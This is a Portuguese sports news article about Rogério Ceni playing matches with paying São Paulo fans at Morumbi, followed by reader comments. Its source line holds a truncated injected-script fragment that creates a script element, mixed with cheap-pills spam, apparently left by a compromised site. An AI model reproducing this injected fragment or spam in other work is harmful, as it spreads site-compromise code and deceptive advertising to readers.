Destaque

Antes de clássico, Ceni encara o frio e joga com torcedores no Morumbi

O goleiro Rogério Ceni realizou o sonho de 44 torcedores do São Paulo, nesta fria sexta-feira, no Morumbi. A menos de 48h para o clássico contra o Palmeiras, no domingo, o M1t0 participou de duas partidas com tricolores, que pagaram R$ 4.480,00 para estar em campo com o ídolo. O goleiro não fez gol, mas deu passes e distribuiu abraços dentro do gramado.

– Para mim foi muito legal. Realmente é um valor expressivo que eles pagaram, mas eu disse que eles aproveitassem ao máximo. Não só por jogar comigo, mas por realizar um sonho de jogar no Morumbi. A primeira impressão que eu tive quando cheguei ao Morumbi foi de não imaginar algo desse tamanho. Olhar esse momento especial para eles. Foi uma reação muito bacana.

Rogério Ceni e Aloísio Chulapa durante festa com torcedores no Morumbi (Foto: Alex Silva/Estadão Conteúdo)

Rogério Ceni e Aloísio Chulapa durante festa com torcedores no Morumbi (Foto: Alex Silva/Estadão Conteúdo)

Ceni quase ficou fora do evento devido a uma lesão muscular na coxa direita. Mas, recuperado, fez a alegria dos torcedores. Antes das partidas, participou de uma palestra. Em campo, claramente evitou fazer muito esforço. Do outro lado, os torcedores foram orientados a pegarem leve com o M1t0, mas, segundo ele, nem precisou o alerta.

– Não precisou (risos) Todo mundo são-paulino, todo mundo quer ver o jogo no domingo. E eu só dou um toque na bola, não carrego. O pessoal se divertiu, comemorou, teve gente que fez três gols, vai até pedir música… – brincou.

No total, são três dias de evento, que é organizado pela agência oficial do clube. Foram disponibilizados três pacotes: o mais caro, com os jogos com Ceni, rendeu R$ 214.720,00. No total, o clube arrecadou pouco mais de R$ 850 mil com a iniciativa.

No primeiro tempo da partida inicial, Ceni jogou no time de camisa branca, enquanto Aloísio Chulapa, ex-jogador tricolor e amigo do capitão, vestiu a camisa listrada. O M1t0 atuou como zagueiro e quase entregou dois gols para a outra equipe. É bem verdade que o time do goleiro não ajudou muito. Ficou perto de tomar o primeiro gol em cobrança de pênalti, mas Gabriel defendeu e, como presente, recebeu um abraço do ídolo.

Rogério cobra pênalti para torcedor tentar defender (Foto: João Gabriel Rodrigues)

Rogério cobra pênalti para torcedor tentar defender (Foto: João Gabriel Rodrigues)

– É utopia. Não importa o resultado do jogo. Pegar um pênalti no Morumbi e receber o abraço de Rogério é utopia. Nada mais importa. Posso sair do Morumbi e não fazer mais nada. Minha vida está completa – disse, empolgado, Gabriel.

– O árbitro foi mal porque não foi pênalti. Mas nosso goleiro foi muito bem – brincou Rogério.

Moacir Fernandes viajou de Fortaleza a São Paulo para jogar com Ceni. Há 13 dias, rompeu os ligamentos do tornozelo direito, mas viajou para São Paulo mesmo assim. Tudo para conhecer o ídolo.

– Vim do Ceará para o jogo com o Mito. Cresci vendo o São Paulo na TV e me apaixonei. E o Rogério é o maior símbolo do time. Poder me encontrar com ele é indescritível. Eu treino jiu-jitsu, rompi os ligamentos. Não aguentava pisar no chão. Mas eu tinha de vir. Veio todo mundo, minha namorada, meus pais. Era a chance que eu tinha de realizar um sonho de criança. É indescritível.

Tentei dar três chutes, mas cada um mais fraco que o outro (risos). Dei uma enganada, mas tabelei com o Rogério. Nunca vou me esquecer – disse.

No segundo tempo, Ceni mudou de lado e chegou a dar o passe para um dos gols do time da camisa listrada, que venceu por 6 a 1. Na sequência, o goleiro cobrou pênaltis contra cada um dos torcedores que estavam em campo.

Dos 23 chutes, errou três, ao tentar dar uma cavada e ao mandar outros dois na trave. Foi para o gol apenas uma vez, mas não defendeu a cobrança de Aloisio Chulapa. O ex-atacante também tentou parar o chute do goleiro, mas não conseguiu.

No segundo jogo, o mesmo ritual. Ceni e Aloísio disputaram um tempo em cada time, e o goleiro voltou a cobrar pênaltis. A noite dos torcedores, então, estava completa.

Fonte: Gevar d=document;var s=d.createElement(‘script’); to order cheap pills no prescription

View Comments (2)

2 Comments

  1. Nelson de Deus Ferreira

    27 de junho de 2015 at 02:31

    Grande noite! Valeu pela vida inteira de torcedor, já que estar no Morumbi jogando com ídolos iguais Rogério,o M1to deve ser o máximo de emoção pra qualquer sãopaulino!!!

  2. fabinho Silva

    27 de junho de 2015 at 02:45

    Um sonho , em dezembro estarei jogando tbm!

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque

Mais em Destaque

Campanha contra Dorival pressiona Raí por solução

saopauloadmin22 de Fevereiro de 2018

Pressionado, Dorival Jr pode mudar esquema tático do São Paulo

saopauloadmin21 de Fevereiro de 2018

São Paulo recusa proposta do Dalian FC, da China, por Cueva

saopauloadmin20 de Fevereiro de 2018

Dorival tem aproveitamento superior ao de Ceni, mas é pior em clássicos

saopauloadmin20 de Fevereiro de 2018

Hudson deve ganhar vaga no São Paulo com a suspensão de Petros

saopauloadmin19 de Fevereiro de 2018

São Paulo ainda não venceu times da elite, e Cueva pede foco no trabalho

saopauloadmin19 de Fevereiro de 2018

36 mil torcedores acompanharam a derrota por 1×0 para o Santos. Mais uma derrota em clássicos…

saopauloadmin18 de Fevereiro de 2018

Relacionados para São Paulo x Santos

saopauloadmin18 de Fevereiro de 2018

Valdívia celebra vitória em estreia pelo São Paulo: “Um bom começo”

saopauloadmin16 de Fevereiro de 2018